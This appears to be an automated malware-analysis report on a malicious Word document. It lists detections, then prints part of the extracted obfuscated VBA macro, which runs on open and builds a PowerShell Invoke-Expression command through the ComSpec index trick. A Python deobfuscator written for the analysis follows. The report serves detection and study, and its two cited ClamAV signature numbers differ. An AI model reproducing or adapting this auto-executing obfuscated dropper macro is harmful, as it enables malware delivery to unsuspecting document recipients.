Verdict: MALICIOUS (risk score 242)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious Office document carrying a VBA macro with an AutoOpen entry point, so the macro runs as soon as the document is opened with macros enabled. The macro assembles its command from many short string fragments, interleaved with meaningless arithmetic on undeclared variables that only survives because of On Error Resume Next, and passes the result to Shell(), i.e. it executes an arbitrary command. The fragments visible in the extracted source spell out a PowerShell invocation: an Invoke-Expression alias derived from $ENV:cOMSpeC[4,26,25]-join'' followed by a [cHaR[]] array of numeric codes. ClamAV's 'Doc.Dropper.Agent-6585389-0' signature classifies the file as a dropper.
Heuristics (7)
- ClamAV: Doc.Dropper.Agent-6585173-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6585173-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code.
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that the "no modern VBA project was recovered" wording is the detector's generic description; a VBA project was in fact extracted from this sample (see Extracted artifacts), so treat this marker as corroborating the AutoOpen finding rather than as an independent one.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML schema namespace present in ordinary Office files and is not an indicator on its own.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 30263 bytes | 95c208a131b5b4c164a0ce7c3c231ec456333690f346aecb1b881d82a9f1d010 |

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "GUdQNukLSBDu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "TIJnHwS"
Function fKdvHiMz()
On Error Resume Next
SjZFn = (waiYo * 51058 + 78669 * CInt(pRwwv - CDbl(98764)) * 85601 * Oct(99024))
wKFkmw = "He" + "ll" + " " + "& " + "( $" + "EN"
ImRDQ = (poflDz * 78704 + 69290 * CInt(qwokV - CDbl(12868)) * 48529 * Oct(68612))
akTXkCTjp = "V:" + "cOM" + "Sp" + "eC["
iMZao = (TRSIQ * 35784 + 42478 * CInt(iztkI - CDbl(78752)) * 71466 * Oct(21055))
GpsiFLzG = "4," + "26" + ",2" + "5]" + "-jo"
hjFzK = (iRjCP * 49668 + 8319 * CInt(OzcRm - CDbl(57899)) * 62677 * Oct(37313))
RDoBlq = "iN" + "'')" + " (("
UiGkbV = (uRTLr * 88304 + 67372 * CInt(JJoqj - CDbl(30525)) * 13366 * Oct(81394))
XsEZKXWf = " [" + "cH" + "aR"
wiljXw = (UOhlPD * 45451 + 4758 * CInt(TIzGsI - CDbl(40133)) * 31175 * Oct(41243))
MUhqUM = "[]]" + "( " + "9 ," + " 1" + "27" + " ,8" + "7 "
dppmj = (rcmzk * 69420 + 45360 * CInt(mrdMz - CDbl(83005)) * 10263 * Oct(72257))
QfYEXCUvBi = ",1" + "07" + ",71"
fKdvHiMz = wKFkmw + akTXkCTjp + GpsiFLzG + RDoBlq + XsEZKXWf + MUhqUM + QfYEXCUvBi
uNHJjl = (JVLOVr * 57795 + 53787 * CInt(YXblFL - CDbl(67304)) * 70045 * Oct(59723))
End Function
Function izcGNkSUho()
On Error Resume Next
BfISi = (rDvYb * 7630 + 15421 * CInt(wnPYIw - CDbl(90351)) * 25725 * Oct(2786))
AzVwjY = " ,1" + "24 " + ",13" + ",1"
ZTdzj = (iXiPjK * 2440 + 5016 * CInt(LiniDW - CDbl(39026)) * 30221 * Oct(69329))
HrUABIDbiL = "6 ," + " 1" + "3, " + "67" + " ," + " 72"
RwKbiZ = (ittKZr * 43100 + 22419 * CInt(EZsHmm - CDbl(23997)) * 84896 * Oct(95211))
rbcjtlz = " ," + " 9" + "0, " + "0," + "66"
HiwsE = (tKPnU * 92258 + 92086 * CInt(vjHJVm - CDbl(74868)) * 33792 * Oct(44775))
jsXFwzU = ", 7" + "9," + "71," + " 72" + ", " + "78 " + ",8"
izcGNkSUho = AzVwjY + HrUABIDbiL + rbcjtlz + jsXFwzU
SuXcD = (jRdQSJ * 61299 + 3715 * CInt(HfjHYZ - CDbl(15763)) * 57349 * Oct(5247))
End Function
Function FIHVOs()
On Error Resume Next
GfDWL = (pHoZKj * 33679 + 14158 * CInt(DCSfXl - CDbl(404)) * 10312 * Oct(39650))
NnBNkkFtV = "9, " + "13," + " 95" + ",7"
GGKwk = (QUQzA * 62479 + 91751 * CInt(kcCqc - CDbl(57996)) * 50828 * Oct(26804))
asIZkIiDFdJ = "6 " + ", " + "67" + " ," + " 7" + "3,6" + "6 "
WVWqw = (aFZiHE * 48641 + 59444 * CInt(EPtMB - CDbl(19524)) * 69042 * Oct(43926))
HVNjzdZ = ", 6" + "4 " + ", "
zuujJ = (qosjnd * 26493 + 38189 * CInt(pqraz - CDbl(77707)) * 26867 * Oct(22200))
QWHmzE = "22" + " ,9" + ", " + "105" + ",11"
umMkOM = (nwPqD * 70038 + 82152 * CInt(wsSLsr - CDbl(59163)) * 82906 * Oct(92185))
HhPMpIbmJ = "0, " + "12" + "6, " + "75" + ",11"
XLSJZS = (jwpXQF * 50780 + 61830 * CInt(AfwdP - CDbl(9169)) * 98659 * Oct(90108))
ArRdkjlwB = "6 " + ",13" + ",16" + ",13" + ", 6"
FIHVOs = NnBNkkFtV + asIZkIiDFdJ + HVNjzdZ + QWHmzE + HhPMpIbmJ + ArRdkjlwB
FVCSGP = (QJqBwd * 48571 + 92950 * CInt(TnBZf - CDbl(73781)) * 85524 * Oct(60981))
End Function
Function FHzIOBrD()
On Error Resume Next
qzsSLS = (XfTzj * 32054 + 80756 * CInt(cAwjiU - CDbl(44032)) * 11591 * Oct(4483))
OlsIYbX = "7, " + "72," + " 90"
vRzVw = (dWqPP * 4761 + 95258 * CInt(YpYwFz - CDbl(42273)) * 6016 * Oct(95662))
BhPipJPYpYi = ", " + "0 ," + " 6" + "6," + "79," + " 71" + " ,7"
wiqIAH = (tqvPB * 27022 + 4476 * CInt(AUMZaK - CDbl(49740)) * 5839 * Oct(96081))
PjuavF = "2,7" + "8 ," + "89 " + ",1" + "3, " + "126"
FHzIOBrD = OlsIYbX + BhPipJPYpYi + PjuavF
pvYAD = (sTWYT * 55796 + 38827 * CInt(jwWMC - CDbl(66625)) * 44070 * Oct(52516))
End Function
Function hrfcjlbI()
On Error Resume Next
RFiJd = (RXbsz * 22013 + 22554 * CInt(tmtXir - CDbl(57085)) * 25010 * Oct(45059))
JGQsjL = ",84" + ", 9" + "4," + " 8" + "9 "
rqinN = (PoOZG * 90591 + 46818 * CInt(PvFBrk - CDbl(43418)) * 19345 * Oct(45784))
MOqjIktr = ",7" + "2, " + "64" + " ," + " 3" + " , "
dZJLo = (sEhiRn * 87773 + 56723 * CInt(bcJzm - CDbl(77909)) * 96169 *
... (truncated)
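To make the string-building concrete, here is an added static deobfuscator (example code written for this page, not part of the analyzer or of the sample) that resolves the concatenation functions in the preview without executing any VBA. Its input is the first two functions copied from the macros.bas preview above, with a few of the junk arithmetic lines trimmed. Two things are assumptions: the ComSpec path used to resolve the index trick is the default for a stock Windows install, and the fragments are joined in definition order, since the caller that actually concatenates them lies in the truncated part of the listing.

```python
import re

# Constructed sample input: the first two functions from the macros.bas preview,
# as extracted, with some of the numeric filler lines removed for brevity.
SAMPLE_VBA = '''
Function fKdvHiMz()
On Error Resume Next
SjZFn = (waiYo * 51058 + 78669 * CInt(pRwwv - CDbl(98764)) * 85601 * Oct(99024))
wKFkmw = "He" + "ll" + " " + "& " + "( $" + "EN"
ImRDQ = (poflDz * 78704 + 69290 * CInt(qwokV - CDbl(12868)) * 48529 * Oct(68612))
akTXkCTjp = "V:" + "cOM" + "Sp" + "eC["
GpsiFLzG = "4," + "26" + ",2" + "5]" + "-jo"
RDoBlq = "iN" + "'')" + " (("
XsEZKXWf = " [" + "cH" + "aR"
MUhqUM = "[]]" + "( " + "9 ," + " 1" + "27" + " ,8" + "7 "
QfYEXCUvBi = ",1" + "07" + ",71"
fKdvHiMz = wKFkmw + akTXkCTjp + GpsiFLzG + RDoBlq + XsEZKXWf + MUhqUM + QfYEXCUvBi
uNHJjl = (JVLOVr * 57795 + 53787 * CInt(YXblFL - CDbl(67304)) * 70045 * Oct(59723))
End Function
Function izcGNkSUho()
On Error Resume Next
AzVwjY = " ,1" + "24 " + ",13" + ",1"
HrUABIDbiL = "6 ," + " 1" + "3, " + "67" + " ," + " 72"
rbcjtlz = " ," + " 9" + "0, " + "0," + "66"
jsXFwzU = ", 7" + "9," + "71," + " 72" + ", " + "78 " + ",8"
izcGNkSUho = AzVwjY + HrUABIDbiL + rbcjtlz + jsXFwzU
End Function
'''

FUNC_START = re.compile(r"^\s*Function\s+([A-Za-z_]\w*)\s*\(\)", re.I)
FUNC_END = re.compile(r"^\s*End\s+Function", re.I)
ASSIGN = re.compile(r"^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$")
STRING_LIT = re.compile(r'"([^"]*)"')


def deobfuscate(vba: str) -> dict:
    """Return {function_name: decoded string} for every Function whose return
    value is built purely from string-literal concatenation.

    Lines that contain no string literal and reference names we have not seen
    are the numeric filler: in VBA the undeclared variables are Empty, the
    CInt() overflows, and On Error Resume Next swallows the error, so they
    contribute nothing to the command and are simply skipped here."""
    decoded, current, env = {}, None, {}
    for line in vba.splitlines():
        if m := FUNC_START.match(line):
            current, env = m.group(1), {}
            continue
        if FUNC_END.match(line):
            current = None
            continue
        if current is None or not (m := ASSIGN.match(line)):
            continue
        name, rhs = m.groups()
        lits = STRING_LIT.findall(rhs)
        if lits:
            env[name] = "".join(lits)            # "a" + "b" + "c"  ->  "abc"
        else:
            parts = [p.strip() for p in rhs.split("+")]
            if all(p in env for p in parts):     # var1 + var2 + ...  (return line)
                env[name] = "".join(env[p] for p in parts)
        if name == current and name in env:      # "FuncName = ..." is VBA's return
            decoded[current] = env[name]
    return decoded


def comspec_slice(indices, comspec=r"C:\WINDOWS\system32\cmd.exe"):
    """Emulate PowerShell's $ENV:ComSpec[i,j,k] -join ''.
    Assumption: default %ComSpec% of a stock Windows install; the case of the
    'I' depends on how the path is spelled, which PowerShell ignores."""
    return "".join(comspec[i] for i in indices)


def reconstruct(vba: str):
    """Join decoded fragments in definition order (assumption, see lead-in)
    and resolve the ComSpec index trick to the cmdlet alias it hides."""
    command = "".join(deobfuscate(vba).values())
    m = re.search(r"\$ENV:ComSpec\[([\d,]+)\]\s*-join\s*''", command, re.I)
    alias = comspec_slice([int(i) for i in m.group(1).split(",")]) if m else None
    return command, alias


if __name__ == "__main__":
    cmd, alias = reconstruct(SAMPLE_VBA)
    print(cmd)
    print("ComSpec index trick resolves to:", alias)
```

Run stand-alone it prints the recovered fragment, which begins `Hell & ( $ENV:cOMSpeC[4,26,25]-joiN'') (( [cHaR[]]( 9 , 127 ,87 ,107,71 ,124 ,13,16 ...`; the index trick resolves to `Iex`, so the `&` operator is invoking Invoke-Expression on whatever the `[cHaR[]]` array becomes. The leading `Hell` is the tail of a word whose head is built in a function outside the preview, and values such as 0, 3, 9 and 13 in the char array cannot be the final plaintext, so expect a further decoding step over those bytes in the truncated part of the macro before they reach Iex. The same approach extends to the remaining functions in the listing as long as they keep to literal concatenation; any fragment produced by Chr(), StrReverse() or similar would need its own evaluator.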